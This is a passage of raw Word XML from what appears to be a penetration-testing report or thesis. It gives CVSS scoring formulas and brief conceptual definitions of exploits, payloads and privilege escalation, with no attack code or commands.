      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3271FCB5" w14:textId="76C719BB" w:rsidR="002D58A1" w:rsidRPr="00D77DFE" w:rsidRDefault="002D58A1" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>BaseScore=RoundUp (</m:t>
          </m:r>
          <m:r>
            <m:rPr>
              <m:sty m:val="p"/>
            </m:rPr>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>min⁡</m:t>
          </m:r>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>(1.08×</m:t>
          </m:r>
          <m:d>
            <m:dPr>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                  <w:i/>
                </w:rPr>
              </m:ctrlPr>
            </m:dPr>
            <m:e>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
                </w:rPr>
                <m:t>Impact+Exploitability</m:t>
              </m:r>
            </m:e>
          </m:d>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>,10)</m:t>
          </m:r>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="0B4EF92D" w14:textId="675DC085" w:rsidR="005926F0" w:rsidRDefault="005926F0" w:rsidP="005926F0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002E891" w14:textId="5C2179EA" w:rsidR="0012238D" w:rsidRPr="005926F0" w:rsidRDefault="00952DE4" w:rsidP="005926F0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>RoundUp</w:t>
      </w:r>
      <w:r w:rsidR="00D136A7" w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0012238D" w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0012238D" w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>round up</w:t>
      </w:r>
      <w:r w:rsidR="0012238D" w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>to 1 decimal place</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC994A0" w14:textId="77777777" w:rsidR="0012238D" w:rsidRPr="005926F0" w:rsidRDefault="00952DE4" w:rsidP="005926F0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>min(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>10)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> cap at 10 (CVSS max</w:t>
      </w:r>
      <w:r w:rsidR="00D136A7" w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>score)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1564AA" w14:textId="117AD44C" w:rsidR="00CC7746" w:rsidRPr="005926F0" w:rsidRDefault="00952DE4" w:rsidP="005926F0">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>1.08 multiplier is applied only if Scope is Changed</w:t>
      </w:r>
      <w:bookmarkStart w:id="46" w:name="paragraph33"/>
      <w:r w:rsidR="0012238D" w:rsidRPr="005926F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink w:anchor="resource33" w:history="1">
        <w:r w:rsidR="00CC7746" w:rsidRPr="005926F0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>[33]</w:t>
        </w:r>
        <w:bookmarkEnd w:id="46"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="667147F6" w14:textId="0537AFC6" w:rsidR="00CC7746" w:rsidRPr="00D77DFE" w:rsidRDefault="003B5D99" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>In addition to the Base Score, other factors may influence the overall severity assessment, including Temporal and Environmental Metrics [34].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E08F7E" w14:textId="77777777" w:rsidR="002D58A1" w:rsidRDefault="003B5D99" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Temporal Metrics account for characteristics that may change over time, such as Exploit Code Maturity (E), Remediation Level (RL), and Report Confidence (RC). The Temporal Score is calculated using the following formula:</w:t>
      </w:r>
      <w:r w:rsidR="00CC7746" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00084D54" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC12FB" w14:textId="1BEB0E2B" w:rsidR="00CC7746" w:rsidRPr="002D58A1" w:rsidRDefault="002D58A1" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>TemporalScore=BaseScore ×E ×RL ×RC</m:t>
          </m:r>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="624A0B51" w14:textId="77777777" w:rsidR="002D58A1" w:rsidRDefault="00CC7746" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Environmental Metrics have factors which specify the impact on a user’s environment </w:t>
      </w:r>
      <w:r w:rsidR="00084D54" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>including</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00084D54" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ecurity requirements for confidentiality, integrity, availability (CR, IR, AR)</w:t>
      </w:r>
      <w:r w:rsidR="00084D54" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and m</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">odified Base Metrics reflecting local </w:t>
      </w:r>
      <w:r w:rsidR="00084D54" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">environment. </w:t>
      </w:r>
      <w:r w:rsidR="00AE660E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It c</w:t>
      </w:r>
      <w:r w:rsidR="00AE660E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">be calculated using the following formula: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A91E7" w14:textId="01778C32" w:rsidR="002D58A1" w:rsidRPr="00D77DFE" w:rsidRDefault="002D58A1" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cstheme="majorBidi"/>
            </w:rPr>
            <m:t>EnvironmentalScore=TemporalScore (adjusted for environment)</m:t>
          </m:r>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="7987D2CC" w14:textId="77349AF3" w:rsidR="00712E47" w:rsidRPr="00D77DFE" w:rsidRDefault="002065C7" w:rsidP="00094048">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc223521098"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="009E776C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE6F4F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploit and Payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidR="00EE6F4F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF263C9" w14:textId="23D1DD00" w:rsidR="0090347A" w:rsidRPr="00D77DFE" w:rsidRDefault="0090347A" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>An exploit is code that takes advantage of a specific vulnerability and demonstrates the real impact an attacker could achieve. For example, a misconfiguration in a service may allow any user to bypass authentication and gain root access. The exploit for such a vulnerability would typically be code that accepts parameters (such as an IP address) and automates the process of gaining root access.</w:t>
      </w:r>
      <w:r w:rsidR="007B11D8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="48" w:name="Paragraph19"/>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "Resource19"</w:instrText>
      </w:r>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007B11D8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[19]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidR="00CA48B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E74234D" w14:textId="42FFBAEA" w:rsidR="00EE6F4F" w:rsidRPr="00D77DFE" w:rsidRDefault="00EE6F4F" w:rsidP="002D58A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A payload is a script or piece of code with malicious intent that is designed to execute specific actions, such as stealing data or gaining control of a system. In penetration testing, common examples include reverse shells, file searchers, and credential dumpers. Payloads are commonly written in languages such as Python, PHP, or Bash.</w:t>
      </w:r>
      <w:r w:rsidR="007B11D8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="49" w:name="Paragraph20"/>
      <w:r w:rsidR="008479D8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008479D8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "Resource20"</w:instrText>
      </w:r>
      <w:r w:rsidR="008479D8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="008479D8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007B11D8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[20]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidR="008479D8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5437080D" w14:textId="39DAEF50" w:rsidR="004A2AB1" w:rsidRPr="00D77DFE" w:rsidRDefault="002065C7" w:rsidP="00A003DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc223521099"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="009E776C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A2AB1" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidR="00A33ED5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pivoting</w:t>
      </w:r>
      <w:r w:rsidR="00A33ED5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, OWASP,</w:t>
      </w:r>
      <w:r w:rsidR="00BF3520" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00A33ED5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Revershell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="783F8EE5" w14:textId="05E2F748" w:rsidR="00B811E7" w:rsidRPr="00D77DFE" w:rsidRDefault="00B811E7" w:rsidP="00B811E7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This subsection explains some of the essential concepts necessary to understand the attacks simulated in this work and the penetration testing techniques applied in this project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B4A77A" w14:textId="1E3F2A1E" w:rsidR="006811F2" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4B69" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Firstly, </w:t>
      </w:r>
      <w:r w:rsidR="00595DCC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Privilege escalation is the process of gaining initial access to a system and then obtaining higher privileges, additional permissions, and greater control by exploiting vulnerabilities, discovering misconfigurations, or dumping credentials.</w:t>
      </w:r>
